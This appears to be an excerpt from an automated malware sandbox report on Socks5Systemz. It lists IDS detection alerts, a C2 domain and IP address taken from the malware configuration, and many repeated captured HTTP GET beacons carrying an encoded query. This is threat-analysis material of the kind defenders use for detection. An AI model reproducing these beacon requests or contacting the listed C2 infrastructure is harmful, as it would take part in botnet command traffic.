        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49738 -> 185.196.8.214:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49725 -> 185.196.8.214:80
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: bwdroig.com
        Source: Joe Sandbox ViewIP Address: 185.196.8.214 185.196.8.214
        Source: Joe Sandbox ViewASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
